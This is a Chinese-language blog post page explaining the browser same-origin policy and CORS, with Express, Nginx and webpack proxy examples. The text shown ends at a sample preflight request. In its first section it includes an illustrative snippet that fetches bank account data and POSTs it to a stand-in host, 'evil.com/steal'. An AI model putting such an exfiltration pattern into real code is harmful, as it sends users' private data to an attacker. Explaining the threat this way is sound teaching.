<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/shaoliang123456/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/shaoliang123456/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/shaoliang123456/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/shaoliang123456/images/logo.svg" color="#222">

<link rel="stylesheet" href="/shaoliang123456/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/7.0.0/css/all.min.css" integrity="sha256-VHqXKFhhMxcpubYf9xiWdCiojEbY9NexQ4jh8AxbvcM=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"shaoliang123456.github.io","root":"/shaoliang123456/","images":"/shaoliang123456/images","scheme":"Pisces","darkmode":false,"version":"8.24.1","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"Searching...","empty":"We didn't find any results for the search: ${query}","hits_time":"${hits} results found in ${time} ms","hits":"${hits} results found"}}</script><script src="/shaoliang123456/js/config.js" defer></script>

    <meta name="description" content="引言在项目开发中，我们经常遇到这样的困扰：用Postman测试API接口一切正常，但在浏览器中却出现了OPTIONS 403错误，提示跨域问题。今天我们就来深入了解跨域的原理和解决方案。 1. 什么是跨域1.1 同源策略同源策略是浏览器的一个重要安全机制，它限制了一个源（origin）的文档或脚本如何能与另一个源的资源进行交互。 同源的定义：  协议相同（http&#x2F;https） 域名相同">
<meta property="og:type" content="article">
<meta property="og:title" content="跨域">
<meta property="og:url" content="https://shaoliang123456.github.io/shaoliang123456/2025/09/01/%E8%B7%A8%E5%9F%9F/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="引言在项目开发中，我们经常遇到这样的困扰：用Postman测试API接口一切正常，但在浏览器中却出现了OPTIONS 403错误，提示跨域问题。今天我们就来深入了解跨域的原理和解决方案。 1. 什么是跨域1.1 同源策略同源策略是浏览器的一个重要安全机制，它限制了一个源（origin）的文档或脚本如何能与另一个源的资源进行交互。 同源的定义：  协议相同（http&#x2F;https） 域名相同">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2025-09-01T10:45:17.000Z">
<meta property="article:modified_time" content="2025-09-01T11:07:00.459Z">
<meta property="article:author" content="Leon">
<meta property="article:tag" content="前端">
<meta property="article:tag" content="网络安全">
<meta property="article:tag" content="CORS">
<meta property="article:tag" content="跨域">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="https://shaoliang123456.github.io/shaoliang123456/2025/09/01/%E8%B7%A8%E5%9F%9F/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"en","comments":true,"permalink":"https://shaoliang123456.github.io/shaoliang123456/2025/09/01/%E8%B7%A8%E5%9F%9F/","path":"2025/09/01/跨域/","title":"跨域"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>跨域 | Hexo</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/shaoliang123456/js/utils.js" defer></script><script src="/shaoliang123456/js/motion.js" defer></script><script src="/shaoliang123456/js/sidebar.js" defer></script><script src="/shaoliang123456/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/shaoliang123456/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/shaoliang123456/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">Hexo</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Welcome to my blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="Search" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/shaoliang123456/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a></li><li class="menu-item menu-item-about"><a href="/shaoliang123456/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a></li><li class="menu-item menu-item-tags"><a href="/shaoliang123456/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a></li><li class="menu-item menu-item-categories"><a href="/shaoliang123456/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a></li><li class="menu-item menu-item-archives"><a href="/shaoliang123456/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%BC%95%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">引言</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#1-%E4%BB%80%E4%B9%88%E6%98%AF%E8%B7%A8%E5%9F%9F"><span class="nav-number">2.</span> <span class="nav-text">1. 什么是跨域</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-1-%E5%90%8C%E6%BA%90%E7%AD%96%E7%95%A5"><span class="nav-number">2.1.</span> <span class="nav-text">1.1 同源策略</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-2-%E8%B7%A8%E5%9F%9F%E5%9C%BA%E6%99%AF%E7%A4%BA%E4%BE%8B"><span class="nav-number">2.2.</span> <span class="nav-text">1.2 跨域场景示例</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#1-3-%E8%A7%A3%E5%86%B3%E7%89%B9%E5%AE%9A%E8%B7%A8%E5%9F%9F%E5%9C%BA%E6%99%AF%E7%9A%84%E6%96%B9%E6%B3%95"><span class="nav-number">2.3.</span> <span class="nav-text">1.3 解决特定跨域场景的方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9C%BA%E6%99%AF1%EF%BC%9A%E5%8D%8F%E8%AE%AE%E4%B8%8D%E5%90%8C%EF%BC%88http-vs-https%EF%BC%89"><span class="nav-number">2.3.1.</span> <span class="nav-text">场景1：协议不同（http vs https）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9C%BA%E6%99%AF2%EF%BC%9A%E5%9F%9F%E5%90%8D%E4%B8%8D%E5%90%8C"><span class="nav-number">2.3.2.</span> <span class="nav-text">场景2：域名不同</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9C%BA%E6%99%AF3%EF%BC%9A%E7%AB%AF%E5%8F%A3%E4%B8%8D%E5%90%8C"><span class="nav-number">2.3.3.</span> <span class="nav-text">场景3：端口不同</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#2-%E4%B8%BA%E4%BB%80%E4%B9%88Postman%E5%8F%AF%E4%BB%A5%EF%BC%8C%E6%B5%8F%E8%A7%88%E5%99%A8%E4%B8%8D%E8%A1%8C%EF%BC%9F"><span class="nav-number">3.</span> <span class="nav-text">2. 为什么Postman可以，浏览器不行？</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#2-1-Postman%E7%9A%84%E7%89%B9%E7%82%B9"><span class="nav-number">3.1.</span> <span class="nav-text">2.1 Postman的特点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-2-%E6%B5%8F%E8%A7%88%E5%99%A8%E7%9A%84%E9%99%90%E5%88%B6"><span class="nav-number">3.2.</span> <span class="nav-text">2.2 浏览器的限制</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#3-CORS%E9%A2%84%E6%A3%80%E8%AF%B7%E6%B1%82%E8%AF%A6%E8%A7%A3"><span class="nav-number">4.</span> <span class="nav-text">3. CORS预检请求详解</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#3-1-%E4%BB%80%E4%B9%88%E6%98%AF%E9%A2%84%E6%A3%80%E8%AF%B7%E6%B1%82"><span class="nav-number">4.1.</span> <span class="nav-text">3.1 什么是预检请求</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#3-2-%E8%A7%A6%E5%8F%91%E9%A2%84%E6%A3%80%E7%9A%84%E6%9D%A1%E4%BB%B6"><span class="nav-number">4.2.</span> <span class="nav-text">3.2 触发预检的条件</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%AE%80%E5%8D%95%E8%AF%B7%E6%B1%82%EF%BC%88%E4%B8%8D%E8%A7%A6%E5%8F%91%E9%A2%84%E6%A3%80%EF%BC%89"><span class="nav-number">4.2.1.</span> <span class="nav-text">简单请求（不触发预检）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A4%8D%E6%9D%82%E8%AF%B7%E6%B1%82%EF%BC%88%E8%A7%A6%E5%8F%91%E9%A2%84%E6%A3%80%EF%BC%89"><span class="nav-number">4.2.2.</span> <span class="nav-text">复杂请求（触发预检）</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#4-%E8%B7%A8%E5%9F%9F%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88"><span class="nav-number">5.</span> <span class="nav-text">4. 跨域解决方案</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#4-1-%E6%9C%8D%E5%8A%A1%E7%AB%AF%E9%85%8D%E7%BD%AECORS"><span class="nav-number">5.1.</span> <span class="nav-text">4.1 服务端配置CORS</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#Node-js-Express%E7%A4%BA%E4%BE%8B"><span class="nav-number">5.1.1.</span> <span class="nav-text">Node.js + Express示例</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Spring-Boot%E7%A4%BA%E4%BE%8B"><span class="nav-number">5.1.2.</span> <span class="nav-text">Spring Boot示例</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-2-%E4%BB%A3%E7%90%86%E8%A7%A3%E5%86%B3%E6%96%B9%E6%A1%88"><span class="nav-number">5.2.</span> <span class="nav-text">4.2 代理解决方案</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%BC%80%E5%8F%91%E7%8E%AF%E5%A2%83-Webpack-DevServer"><span class="nav-number">5.2.1.</span> <span class="nav-text">开发环境 - Webpack DevServer</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E7%94%9F%E4%BA%A7%E7%8E%AF%E5%A2%83-Nginx%E5%8F%8D%E5%90%91%E4%BB%A3%E7%90%86"><span class="nav-number">5.2.2.</span> <span class="nav-text">生产环境 - Nginx反向代理</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#5-%E6%9C%80%E4%BD%B3%E5%AE%9E%E8%B7%B5%E5%92%8C%E5%AE%89%E5%85%A8%E5%BB%BA%E8%AE%AE"><span class="nav-number">6.</span> <span class="nav-text">5. 最佳实践和安全建议</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#5-1-%E7%94%9F%E4%BA%A7%E7%8E%AF%E5%A2%83%E9%85%8D%E7%BD%AE"><span class="nav-number">6.1.</span> <span class="nav-text">5.1 生产环境配置</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#5-2-%E5%89%8D%E7%AB%AF%E5%A4%84%E7%90%86%E8%B7%A8%E5%9F%9F%E9%94%99%E8%AF%AF"><span class="nav-number">6.2.</span> <span class="nav-text">5.2 前端处理跨域错误</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#6-%E8%B0%83%E8%AF%95%E8%B7%A8%E5%9F%9F%E9%97%AE%E9%A2%98%E7%9A%84%E6%96%B9%E6%B3%95"><span class="nav-number">7.</span> <span class="nav-text">6. 调试跨域问题的方法</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#6-1-%E6%B5%8F%E8%A7%88%E5%99%A8%E5%BC%80%E5%8F%91%E8%80%85%E5%B7%A5%E5%85%B7"><span class="nav-number">7.1.</span> <span class="nav-text">6.1 浏览器开发者工具</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-2-%E5%B8%B8%E7%94%A8%E8%B0%83%E8%AF%95%E6%8A%80%E5%B7%A7"><span class="nav-number">7.2.</span> <span class="nav-text">6.2 常用调试技巧</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#7-%E6%80%BB%E7%BB%93"><span class="nav-number">8.</span> <span class="nav-text">7. 总结</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="nav-number">9.</span> <span class="nav-text">参考资料</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">Leon</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/shaoliang123456/archives/">
          <span class="site-state-item-count">9</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/shaoliang123456/categories/">
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/shaoliang123456/tags/">
        <span class="site-state-item-count">24</span>
        <span class="site-state-item-name">tags</span></a>
      </div>
  </nav>
</div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="en">
    <link itemprop="mainEntityOfPage" href="https://shaoliang123456.github.io/shaoliang123456/2025/09/01/%E8%B7%A8%E5%9F%9F/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/shaoliang123456/images/avatar.gif">
      <meta itemprop="name" content="Leon">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="跨域 | Hexo">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          跨域
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">Posted on</span>
      

      <time title="Created: 2025-09-01 18:45:17 / Modified: 19:07:00" itemprop="dateCreated datePublished" datetime="2025-09-01T18:45:17+08:00">2025-09-01</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">In</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/shaoliang123456/categories/%E5%89%8D%E7%AB%AF%E5%BC%80%E5%8F%91/" itemprop="url" rel="index"><span itemprop="name">前端开发</span></a>
        </span>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><h2 id="引言"><a href="#引言" class="headerlink" title="引言"></a>引言</h2><p>在项目开发中，我们经常遇到这样的困扰：用Postman测试API接口一切正常，但在浏览器中却出现了OPTIONS 403错误，提示跨域问题。今天我们就来深入了解跨域的原理和解决方案。</p>
<h2 id="1-什么是跨域"><a href="#1-什么是跨域" class="headerlink" title="1. 什么是跨域"></a>1. 什么是跨域</h2><h3 id="1-1-同源策略"><a href="#1-1-同源策略" class="headerlink" title="1.1 同源策略"></a>1.1 同源策略</h3><p>同源策略是浏览器的一个重要安全机制，它限制了一个源（origin）的文档或脚本如何能与另一个源的资源进行交互。</p>
<p><strong>同源的定义：</strong></p>
<ul>
<li>协议相同（http&#x2F;https）</li>
<li>域名相同</li>
<li>端口相同</li>
</ul>
<p><strong>同源策略的安全目的：</strong></p>
<ol>
<li><strong>防止CSRF攻击</strong>：阻止恶意网站向用户已登录的网站发送请求</li>
<li><strong>保护用户隐私</strong>：防止恶意脚本读取其他网站的敏感数据</li>
<li><strong>防止XSS攻击扩散</strong>：限制恶意脚本跨域访问资源</li>
<li><strong>保护API安全</strong>：防止未授权的跨域API调用</li>
</ol>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 恶意网站想要获取用户银行信息的例子</span></span><br><span class="line"><span class="comment">// 如果没有同源策略，恶意网站可以这样做：</span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://bank.com/account-info&#x27;</span>)  <span class="comment">// 被同源策略阻止</span></span><br><span class="line">  .<span class="title function_">then</span>(<span class="function"><span class="params">data</span> =&gt;</span> &#123;</span><br><span class="line">    <span class="comment">// 窃取用户银行信息发送到恶意服务器</span></span><br><span class="line">    <span class="title function_">fetch</span>(<span class="string">&#x27;https://evil.com/steal&#x27;</span>, &#123; </span><br><span class="line">      <span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>, </span><br><span class="line">      <span class="attr">body</span>: data </span><br><span class="line">    &#125;);</span><br><span class="line">  &#125;);</span><br></pre></td></tr></table></figure>

<h3 id="1-2-跨域场景示例"><a href="#1-2-跨域场景示例" class="headerlink" title="1.2 跨域场景示例"></a>1.2 跨域场景示例</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 当前页面：https://www.example.com:8080</span></span><br><span class="line"><span class="comment">// 以下请求都属于跨域：</span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;http://www.example.com:8080/api&#x27;</span>)   <span class="comment">// 协议不同</span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://api.example.com:8080/data&#x27;</span>) <span class="comment">// 域名不同  </span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://www.example.com:9000/api&#x27;</span>)  <span class="comment">// 端口不同</span></span><br></pre></td></tr></table></figure>

<h3 id="1-3-解决特定跨域场景的方法"><a href="#1-3-解决特定跨域场景的方法" class="headerlink" title="1.3 解决特定跨域场景的方法"></a>1.3 解决特定跨域场景的方法</h3><h4 id="场景1：协议不同（http-vs-https）"><a href="#场景1：协议不同（http-vs-https）" class="headerlink" title="场景1：协议不同（http vs https）"></a>场景1：协议不同（http vs https）</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 问题：https://www.example.com:8080 访问 http://www.example.com:8080/api</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 解决方案：</span></span><br><span class="line"><span class="comment">// 1. 统一使用HTTPS（推荐）</span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;https://www.example.com:8080/api&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment">// 2. 服务端同时支持HTTP和HTTPS，配置重定向</span></span><br><span class="line"><span class="comment">// Nginx配置示例：</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">server &#123;</span></span><br><span class="line"><span class="comment">    listen 80;</span></span><br><span class="line"><span class="comment">    server_name www.example.com;</span></span><br><span class="line"><span class="comment">    return 301 https://$server_name$request_uri;</span></span><br><span class="line"><span class="comment">&#125;</span></span><br><span class="line"><span class="comment">*/</span></span><br></pre></td></tr></table></figure>

<h4 id="场景2：域名不同"><a href="#场景2：域名不同" class="headerlink" title="场景2：域名不同"></a>场景2：域名不同</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 问题：https://www.example.com:8080 访问 https://api.example.com:8080/data</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 解决方案1：服务端配置CORS</span></span><br><span class="line"><span class="comment">// 在api.example.com服务端添加：</span></span><br><span class="line">app.<span class="title function_">use</span>(<span class="function">(<span class="params">req, res, next</span>) =&gt;</span> &#123;</span><br><span class="line">  res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Origin&#x27;</span>, <span class="string">&#x27;https://www.example.com:8080&#x27;</span>);</span><br><span class="line">  res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Methods&#x27;</span>, <span class="string">&#x27;GET, POST, PUT, DELETE&#x27;</span>);</span><br><span class="line">  res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Headers&#x27;</span>, <span class="string">&#x27;Content-Type, Authorization&#x27;</span>);</span><br><span class="line">  <span class="title function_">next</span>();</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 解决方案2：使用代理</span></span><br><span class="line"><span class="comment">// 在www.example.com的服务器配置反向代理</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">location /api/ &#123;</span></span><br><span class="line"><span class="comment">    proxy_pass https://api.example.com:8080/;</span></span><br><span class="line"><span class="comment">    proxy_set_header Host $host;</span></span><br><span class="line"><span class="comment">    proxy_set_header X-Real-IP $remote_addr;</span></span><br><span class="line"><span class="comment">&#125;</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 前端调用代理地址</span></span><br><span class="line"><span class="title function_">fetch</span>(<span class="string">&#x27;/api/data&#x27;</span>)  <span class="comment">// 实际请求到api.example.com</span></span><br></pre></td></tr></table></figure>

<h4 id="场景3：端口不同"><a href="#场景3：端口不同" class="headerlink" title="场景3：端口不同"></a>场景3：端口不同</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 问题：https://www.example.com:8080 访问 https://www.example.com:9000/api</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 解决方案1：统一端口（生产环境推荐）</span></span><br><span class="line"><span class="comment">// 使用Nginx或负载均衡器统一到80/443端口</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">upstream backend &#123;</span></span><br><span class="line"><span class="comment">    server localhost:9000;</span></span><br><span class="line"><span class="comment">&#125;</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">server &#123;</span></span><br><span class="line"><span class="comment">    listen 8080;</span></span><br><span class="line"><span class="comment">    server_name www.example.com;</span></span><br><span class="line"><span class="comment">    </span></span><br><span class="line"><span class="comment">    location /api/ &#123;</span></span><br><span class="line"><span class="comment">        proxy_pass http://backend/;</span></span><br><span class="line"><span class="comment">    &#125;</span></span><br><span class="line"><span class="comment">&#125;</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 解决方案2：服务端配置CORS</span></span><br><span class="line"><span class="comment">// 在9000端口的服务配置：</span></span><br><span class="line">app.<span class="title function_">use</span>(<span class="function">(<span class="params">req, res, next</span>) =&gt;</span> &#123;</span><br><span class="line">  res.<span class="title function_">header</span>(<span class="string">&#x27;Access-Control-Allow-Origin&#x27;</span>, <span class="string">&#x27;https://www.example.com:8080&#x27;</span>);</span><br><span class="line">  <span class="comment">// ...其他CORS配置</span></span><br><span class="line">  <span class="title function_">next</span>();</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 解决方案3：开发环境使用代理</span></span><br><span class="line"><span class="comment">// webpack.config.js</span></span><br><span class="line"><span class="variable language_">module</span>.<span class="property">exports</span> = &#123;</span><br><span class="line">  <span class="attr">devServer</span>: &#123;</span><br><span class="line">    <span class="attr">port</span>: <span class="number">8080</span>,</span><br><span class="line">    <span class="attr">proxy</span>: &#123;</span><br><span class="line">      <span class="string">&#x27;/api&#x27;</span>: &#123;</span><br><span class="line">        <span class="attr">target</span>: <span class="string">&#x27;https://www.example.com:9000&#x27;</span>,</span><br><span class="line">        <span class="attr">changeOrigin</span>: <span class="literal">true</span></span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<h2 id="2-为什么Postman可以，浏览器不行？"><a href="#2-为什么Postman可以，浏览器不行？" class="headerlink" title="2. 为什么Postman可以，浏览器不行？"></a>2. 为什么Postman可以，浏览器不行？</h2><h3 id="2-1-Postman的特点"><a href="#2-1-Postman的特点" class="headerlink" title="2.1 Postman的特点"></a>2.1 Postman的特点</h3><ul>
<li>Postman是独立的HTTP客户端工具</li>
<li>不受浏览器同源策略限制</li>
<li>直接发送HTTP请求，无需预检</li>
</ul>
<h3 id="2-2-浏览器的限制"><a href="#2-2-浏览器的限制" class="headerlink" title="2.2 浏览器的限制"></a>2.2 浏览器的限制</h3><ul>
<li>严格执行同源策略</li>
<li>复杂请求需要预检（OPTIONS请求）</li>
<li>对跨域资源访问有严格控制</li>
</ul>
<h2 id="3-CORS预检请求详解"><a href="#3-CORS预检请求详解" class="headerlink" title="3. CORS预检请求详解"></a>3. CORS预检请求详解</h2><h3 id="3-1-什么是预检请求"><a href="#3-1-什么是预检请求" class="headerlink" title="3.1 什么是预检请求"></a>3.1 什么是预检请求</h3><p>浏览器在发送某些跨域请求前，会先发送OPTIONS请求进行预检：</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">OPTIONS</span> <span class="string">/api/user</span> <span class="meta">HTTP/1.1</span></span><br><span class="line"><span class="attribute">Host</span><span class="punctuation">: </span>api.example.com</span><br><span class="line"><span class="attribute">Origin</span><span class="punctuation">: </span>https://www.mysite.com</span><br><span class="line"><span class="attribute">Access-Control-Request-Method</span><span class="punctuation">: </span>POST</span><br><span class="line"><span class="attribute">Access-Control-Request-Headers</span><span class="punctuation">: </span>Content-Type</span><br></pre></td></tr></table></figure>

